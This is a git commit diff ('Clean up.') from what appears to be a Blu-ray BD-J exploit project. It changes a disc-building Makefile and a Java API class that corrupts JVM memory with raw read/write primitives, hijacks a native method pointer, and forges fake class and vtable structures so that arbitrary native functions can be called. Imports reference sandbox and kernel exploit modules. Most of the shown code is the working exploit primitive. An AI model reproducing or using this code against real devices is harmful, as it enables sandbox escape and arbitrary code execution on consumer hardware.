Clean up.

This commit is contained in:
Andy Nguyen 2021-11-04 23:29:24 +01:00
parent 9dcf0bfe7f
commit 8d7ad41156
3 changed files with 36 additions and 22 deletions

View File

@ -28,7 +28,7 @@ CLASSES = \
JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar" JFLAGS = -Xlint:all -Xlint:-options -source 1.4 -target 1.4 -bootclasspath "$(LIB)/rt.jar:$(LIB)/bdjstack.jar"
all: directory serialized classes jar bdmv all: directory serialized classes jar bdjo_bdmv
directory: directory:
mkdir -p $(BUILD) mkdir -p $(BUILD)
@ -47,7 +47,7 @@ jar:
cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd .. cd $(BUILD) && jar cf ../$(DISC)/BDMV/JAR/00000.jar . && cd ..
java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar java -cp "$(TOOLS)/security.jar:$(TOOLS)/bcprov-jdk15-137.jar:$(TOOLS)/tools.jar" net.java.bd.tools.security.BDSigner $(DISC)/BDMV/JAR/00000.jar
bdmv: bdjo_bdmv:
java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo java -jar $(TOOLS)/bdjo.jar $(BDMV)/bdjo.xml $(DISC)/BDMV/BDJO/00000.bdjo
java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv java -jar $(TOOLS)/MovieObject.jar $(BDMV)/MovieObject.xml $(DISC)/BDMV/MovieObject.bdmv
java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv java -jar $(TOOLS)/index.jar $(BDMV)/index.xml $(DISC)/BDMV/index.bdmv

View File

@ -81,6 +81,10 @@ public final class API {
private native long multiNewArray(long componentType, int[] dimensions); private native long multiNewArray(long componentType, int[] dimensions);
public boolean isJdk11() {
return jdk11;
}
private void init() throws Exception { private void init() throws Exception {
initUnsafe(); initUnsafe();
initDlsym(); initDlsym();
@ -112,6 +116,7 @@ public final class API {
} }
handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME); handleField = nativeLibraryClass.getDeclaredField(HANDLE_FIELD_NAME);
findMethod.setAccessible(true); findMethod.setAccessible(true);
handleField.setAccessible(true); handleField.setAccessible(true);
@ -174,6 +179,7 @@ public final class API {
long apiInstance = addrof(this); long apiInstance = addrof(this);
long apiKlass = read64(apiInstance + 0x08); long apiKlass = read64(apiInstance + 0x08);
boolean installed = false;
if (jdk11) { if (jdk11) {
long methods = read64(apiKlass + 0x170); long methods = read64(apiKlass + 0x170);
int numMethods = read32(methods + 0x00); int numMethods = read32(methods + 0x00);
@ -194,7 +200,8 @@ public final class API {
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME) if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) { && signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray); write64(method + 0x50, Java_java_lang_reflect_Array_multiNewArray);
return; installed = true;
break;
} }
} }
} else { } else {
@ -217,14 +224,26 @@ public final class API {
if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME) if (name.equals(MULTI_NEW_ARRAY_METHOD_NAME)
&& signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) { && signature.equals(MULTI_NEW_ARRAY_METHOD_SIGNATURE)) {
write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray); write64(method + 0x78, Java_java_lang_reflect_Array_multiNewArray);
return; installed = true;
break;
} }
} }
} }
if (!installed) {
throw new IllegalStateException("Could not install native method."); throw new IllegalStateException("Could not install native method.");
} }
// Invoke call method many times to kick in optimization.
train();
}
private void train() {
for (int i = 0; i < 10000; i++) {
call(0);
}
}
private void buildContext( private void buildContext(
long contextBuf, long contextBuf,
long jmpBuf, long jmpBuf,
@ -262,12 +281,6 @@ public final class API {
write64(contextBuf + 0x118, 0); write64(contextBuf + 0x118, 0);
} }
public void train() {
for (int i = 0; i < 10000; i++) {
call(0);
}
}
public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) { public long call(long func, long arg0, long arg1, long arg2, long arg3, long arg4, long arg5) {
long fakeClassOop = malloc(INT64_SIZE); long fakeClassOop = malloc(INT64_SIZE);
long fakeClass = malloc(0x100); long fakeClass = malloc(0x100);
@ -278,11 +291,6 @@ public final class API {
throw new IllegalStateException("Could not allocate memory."); throw new IllegalStateException("Could not allocate memory.");
} }
write64(fakeClassOop, 0);
memset(fakeClass, 0, 0x100);
memset(fakeKlass, 0, 0x200);
memset(fakeKlassVtable, 0, 0x400);
try { try {
long ret = 0; long ret = 0;
@ -306,11 +314,14 @@ public final class API {
} else { } else {
write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate write64(fakeKlassVtable + 0x158, __Ux86_64_setcontext); // multi_allocate
} }
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS); ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
if (i == 0) {
buildContext( buildContext(
fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5); fakeKlass + 0x00, fakeKlass + 0x00, func, arg0, arg1, arg2, arg3, arg4, arg5);
} }
}
} else { } else {
write64(fakeClassOop + 0x00, fakeClass); write64(fakeClassOop + 0x00, fakeClass);
write64(fakeClass + 0x68, fakeKlass); write64(fakeClass + 0x68, fakeKlass);
@ -326,12 +337,15 @@ public final class API {
} else { } else {
write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate write64(fakeKlassVtable + 0x230, __Ux86_64_setcontext); // multi_allocate
} }
ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS); ret = multiNewArray(fakeClassOop, MULTI_NEW_ARRAY_DIMENSIONS);
if (i == 0) {
buildContext( buildContext(
fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5); fakeKlass + 0x20, fakeKlass + 0x20, func, arg0, arg1, arg2, arg3, arg4, arg5);
} }
} }
}
if (ret == 0) { if (ret == 0) {
return 0; return 0;

View File

@ -7,11 +7,11 @@
package com.bdjb; package com.bdjb;
import com.bdjb.exploit.sandbox.ExploitSandboxInterface; import com.bdjb.exploit.kernel.ExploitKernelInterface;
import com.bdjb.exploit.sandbox.ExploitDefaultImpl; import com.bdjb.exploit.sandbox.ExploitDefaultImpl;
import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl; import com.bdjb.exploit.sandbox.ExploitUserPrefsImpl;
import com.bdjb.exploit.sandbox.ExploitSandboxInterface;
import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl; import com.bdjb.exploit.sandbox.ExploitServiceProxyImpl;
import com.bdjb.exploit.kernel.ExploitKernelInterface;
import java.io.FileOutputStream; import java.io.FileOutputStream;
import java.io.InputStream; import java.io.InputStream;
import java.io.OutputStream; import java.io.OutputStream;